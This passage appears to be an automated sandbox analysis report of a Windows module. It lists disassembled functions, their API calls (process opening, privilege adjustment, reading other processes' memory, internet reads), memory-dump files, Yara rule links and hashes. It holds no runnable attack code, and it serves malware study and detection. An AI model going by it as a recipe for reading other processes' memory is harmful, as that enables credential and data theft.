                                                                                                                                        • Part of subcall function 69E9CCF0: ZwOpenProcess.NTDLL(?,?,?,?,00010000,001FFFFF,?,?), ref: 69E9CD5C
                                                                                                                                        • Part of subcall function 69E9CCF0: ZwOpenProcess.NTDLL(00010000,001FFFFF,?,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 69E9CD7F
                                                                                                                                        • Part of subcall function 69E9CCF0: ZwAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00001000,00000004,?,?,?,?,00010000,001FFFFF,?,?), ref: 69E9CDA7
                                                                                                                                        • Part of subcall function 69E9CCF0: ZwQuerySystemInformation.NTDLL(00000010,00000000,00000001,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 69E9CDC0
                                                                                                                                        • Part of subcall function 69E9CCF0: ZwFreeVirtualMemory.NTDLL(000000FF,00000014,00000014,00008000,?,?,?,?,00010000,001FFFFF,?,?), ref: 69E9CDD7
                                                                                                                                        • Part of subcall function 69E9CCF0: ZwAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00001000,00000004,?,?,?,?,00010000,001FFFFF,?,?), ref: 69E9CE00
                                                                                                                                        • Part of subcall function 69E9CCF0: ZwQuerySystemInformation.NTDLL(00000010,00000000,00000001,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 69E9CE13
                                                                                                                                      • ReadProcessMemory.KERNEL32 ref: 69EA0E95
                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 69EA0EC3
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Memory$ProcessVirtual$AllocateCloseHandleInformationModule32OpenQuerySystem$AdjustCreateFirstFreeNextPrivilegeReadSnapshotToolhelp32_memset
                                                                                                                                      • String ID: D3DX81ab.dll$U
                                                                                                                                      • API String ID: 3593499547-197349503
                                                                                                                                      • Opcode ID: 20a0e15261e0b1b2b6b70e0fe969169f126b6ef2eeae31c056d3d31b352153e2
                                                                                                                                      • Instruction ID: 995f5a46b8c10229828a6550bd7394d2751d3a5a37ad56f47157c70b731b2af6
                                                                                                                                      • Opcode Fuzzy Hash: 20a0e15261e0b1b2b6b70e0fe969169f126b6ef2eeae31c056d3d31b352153e2
                                                                                                                                      • Instruction Fuzzy Hash: E701D221609390AAD711D7299C44A5FBFD86FD3625F18C61DF8E897292E370D509C3E3
                                                                                                                                      Function 69EA1C00 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 48COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 69E9CCF0: RtlAdjustPrivilege.NTDLL ref: 69E9CD1C
                                                                                                                                        • Part of subcall function 69E9CCF0: ZwOpenProcess.NTDLL(?,?,?,?,00010000,001FFFFF,?,?), ref: 69E9CD5C
                                                                                                                                        • Part of subcall function 69E9CCF0: ZwOpenProcess.NTDLL(00010000,001FFFFF,?,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 69E9CD7F
                                                                                                                                        • Part of subcall function 69E9CCF0: ZwAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00001000,00000004,?,?,?,?,00010000,001FFFFF,?,?), ref: 69E9CDA7
                                                                                                                                        • Part of subcall function 69E9CCF0: ZwQuerySystemInformation.NTDLL(00000010,00000000,00000001,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 69E9CDC0
                                                                                                                                        • Part of subcall function 69E9CCF0: ZwFreeVirtualMemory.NTDLL(000000FF,00000014,00000014,00008000,?,?,?,?,00010000,001FFFFF,?,?), ref: 69E9CDD7
                                                                                                                                        • Part of subcall function 69E9CCF0: ZwAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00001000,00000004,?,?,?,?,00010000,001FFFFF,?,?), ref: 69E9CE00
                                                                                                                                        • Part of subcall function 69E9CCF0: ZwQuerySystemInformation.NTDLL(00000010,00000000,00000001,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 69E9CE13
                                                                                                                                      • ReadProcessMemory.KERNEL32 ref: 69EA1C4F
                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 69EA1C7D
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Memory$ProcessVirtual$AllocateInformationOpenQuerySystem$AdjustCloseFreeHandlePrivilegeRead
                                                                                                                                      • String ID: (9k$U
                                                                                                                                      • API String ID: 3726627124-349914351
                                                                                                                                      • Opcode ID: b13ddaddd2709ad43b95f53306de4608087890139d65b9c75ed92e1ef8b3df4c
                                                                                                                                      • Instruction ID: 56cab60b20c005fd8ef447bed4ca2ef71ed3eee412d834516cf97dec8d180dcf
                                                                                                                                      • Opcode Fuzzy Hash: b13ddaddd2709ad43b95f53306de4608087890139d65b9c75ed92e1ef8b3df4c
                                                                                                                                      • Instruction Fuzzy Hash: 9A11A0316087819AC301DB2C8845A5FBBD1AFDA664F408A5DF4A8CB2A2D374C509C7AB
                                                                                                                                      Function 69EBA10C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43libraryloaderCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 69EB5395: EnterCriticalSection.KERNEL32(69EF01A0,?,?,00000000,?,69EB4C9C,00000010,00000008,69EB4B47,69EB4AEA,69EAF4DD,69EB2D49,69E8BFE2,00000000), ref: 69EB53CF
                                                                                                                                        • Part of subcall function 69EB5395: InitializeCriticalSection.KERNEL32(?,?,00000000,?,69EB4C9C,00000010,00000008,69EB4B47,69EB4AEA,69EAF4DD,69EB2D49,69E8BFE2,00000000), ref: 69EB53E1
                                                                                                                                        • Part of subcall function 69EB5395: LeaveCriticalSection.KERNEL32(69EF01A0,?,00000000,?,69EB4C9C,00000010,00000008,69EB4B47,69EB4AEA,69EAF4DD,69EB2D49,69E8BFE2,00000000), ref: 69EB53EE
                                                                                                                                        • Part of subcall function 69EB5395: EnterCriticalSection.KERNEL32(?,?,?,00000000,?,69EB4C9C,00000010,00000008,69EB4B47,69EB4AEA,69EAF4DD,69EB2D49,69E8BFE2,00000000), ref: 69EB53FE
                                                                                                                                        • Part of subcall function 69EB4C81: __EH_prolog3_catch.LIBCMT ref: 69EB4C88
                                                                                                                                        • Part of subcall function 69EAF4C1: __CxxThrowException@8.LIBCMT ref: 69EAF4D7
                                                                                                                                        • Part of subcall function 69EAF4C1: __EH_prolog3.LIBCMT ref: 69EAF4E4
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,HtmlHelpA), ref: 69EBA155
                                                                                                                                      • FreeLibrary.KERNEL32(?), ref: 69EBA165
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CriticalSection$Enter$AddressException@8FreeH_prolog3H_prolog3_catchInitializeLeaveLibraryProcThrow
                                                                                                                                      • String ID: HtmlHelpA$hhctrl.ocx
                                                                                                                                      • API String ID: 2853499158-63838506
                                                                                                                                      • Opcode ID: c98cdcb81964c57f218b72ebbf92928e4afad2cd7fbab034e75803e862ea0cfe
                                                                                                                                      • Instruction ID: dc68bc9d3c33e780597856d3fa168bc168782918b40b4cca2acb8713c5960994
                                                                                                                                      • Opcode Fuzzy Hash: c98cdcb81964c57f218b72ebbf92928e4afad2cd7fbab034e75803e862ea0cfe
                                                                                                                                      • Instruction Fuzzy Hash: 9701D6B5485706EBDF225FA5CB05B1A3BE49F00365F30D41DF54A9D268EF70C411CA61
                                                                                                                                      Function 69ED040C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • ___BuildCatchObject.LIBCMT ref: 69ED041F
                                                                                                                                        • Part of subcall function 69ED037A: ___BuildCatchObjectHelper.LIBCMT ref: 69ED03B0
                                                                                                                                      • _UnwindNestedFrames.LIBCMT ref: 69ED0436
                                                                                                                                      • ___FrameUnwindToState.LIBCMT ref: 69ED0444
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                                                                                                                                      • String ID: csm
                                                                                                                                      • API String ID: 2163707966-1018135373
                                                                                                                                      • Opcode ID: 5913b25dbe5db660d2cb525f3d15ed424d6664de46e93c31d6c202bbad5ecc04
                                                                                                                                      • Instruction ID: 15604096216aa59c43ef2f5b814ca90b8fe6733bc0e08c6257b901c3979ca05c
                                                                                                                                      • Opcode Fuzzy Hash: 5913b25dbe5db660d2cb525f3d15ed424d6664de46e93c31d6c202bbad5ecc04
                                                                                                                                      • Instruction Fuzzy Hash: 58012435000109FBDF129F51CD44EEA3F6AEF4835AF249018FD6814220D736D9B6DBA1
                                                                                                                                      Function 69ED189A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38libraryloaderCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • GetModuleHandleA.KERNEL32(KERNEL32,69EC5BE9), ref: 69ED189F
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 69ED18AF
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AddressHandleModuleProc
                                                                                                                                      • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                                                                      • API String ID: 1646373207-3105848591
                                                                                                                                      • Opcode ID: 23de255cc5a3e244e82b27f9ee69ea614489832584653ed283dc351b59b901c3
                                                                                                                                      • Instruction ID: 0966289434749ffc19cab705fe35a53dc3a164e1b28f7e32fe534d22c84f8821
                                                                                                                                      • Opcode Fuzzy Hash: 23de255cc5a3e244e82b27f9ee69ea614489832584653ed283dc351b59b901c3
                                                                                                                                      • Instruction Fuzzy Hash: 4CF03034A40A49E2EF015BF1BE092AF7BB9FF82745F920590D592A00C8DF30817A8252
                                                                                                                                      Function 69EBDB8C Relevance: 6.1, APIs: 4, Instructions: 131timeCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • _memset.LIBCMT ref: 69EBDBA3
                                                                                                                                        • Part of subcall function 69EAF50C: __cftof.LIBCMT ref: 69EAF51D
                                                                                                                                      • GetFileTime.KERNEL32(?,?,?,?), ref: 69EBDBDA
                                                                                                                                      • GetFileSizeEx.KERNEL32(?,?), ref: 69EBDBF2
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: File$SizeTime__cftof_memset
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2749391713-0
                                                                                                                                      • Opcode ID: 318839d21110fe695ac9a6336877e40330815d457c3ff96ca9da180da0cc387a
                                                                                                                                      • Instruction ID: eef0915b6093fa4e281c56b8c30d3755f612e9483af136fb000abfd00f754df9
                                                                                                                                      • Opcode Fuzzy Hash: 318839d21110fe695ac9a6336877e40330815d457c3ff96ca9da180da0cc387a
                                                                                                                                      • Instruction Fuzzy Hash: 3A512EB59046059FC720CF64DA41D9AB7F8BF09324F208A2EE5A6D7690E770F545CF60
                                                                                                                                      Function 69EA0490 Relevance: 6.1, APIs: 4, Instructions: 110COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • _memset.LIBCMT ref: 69EA04BE
                                                                                                                                        • Part of subcall function 69EA3FB0: _memset.LIBCMT ref: 69EA3FD8
                                                                                                                                      • _memset.LIBCMT ref: 69EA04FC
                                                                                                                                      • _memset.LIBCMT ref: 69EA0513
                                                                                                                                      • _memset.LIBCMT ref: 69EA0530
                                                                                                                                        • Part of subcall function 69E9E110: LoadLibraryA.KERNEL32(version.dll,?,?,00000000), ref: 69E9E14C
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _memset$LibraryLoad
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1275148839-0
                                                                                                                                      • Opcode ID: 04b0a30f909ee561c18b9d4dc5fedc7e1b829d9e6c850afc9d348d6a2f4380b7
                                                                                                                                      • Instruction ID: 954030141e739d3b863d2d4de403bf4a101cb9e1c60ed0a1c40fe9b7ceed9e6b
                                                                                                                                      • Opcode Fuzzy Hash: 04b0a30f909ee561c18b9d4dc5fedc7e1b829d9e6c850afc9d348d6a2f4380b7
                                                                                                                                      • Instruction Fuzzy Hash: EA31E2B5508285AFD321CB20DD95FEB77ECAF89308F54882DE9988B111F630960CC7A2
                                                                                                                                      Function 69EB3A46 Relevance: 6.1, APIs: 4, Instructions: 89filenetworkCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: FileInternetRead_memset
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 707442687-0
                                                                                                                                      • Opcode ID: aa68a059c68b17995899e76bfd3af79bd5c4fa111d71edf536a14bd948b6c796
                                                                                                                                      • Instruction ID: cc9672ca58a8097f12e163418db096d80d7220743b3687b97998495d682fe953
                                                                                                                                      • Opcode Fuzzy Hash: aa68a059c68b17995899e76bfd3af79bd5c4fa111d71edf536a14bd948b6c796
                                                                                                                                      • Instruction Fuzzy Hash: F031AC31201644AFDB21CF25CA82F57BBF9FF41344F606919E9828AA54D372F944CB50
                                                                                                                                      Function 69EAA3B0 Relevance: 6.1, APIs: 4, Instructions: 86COMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
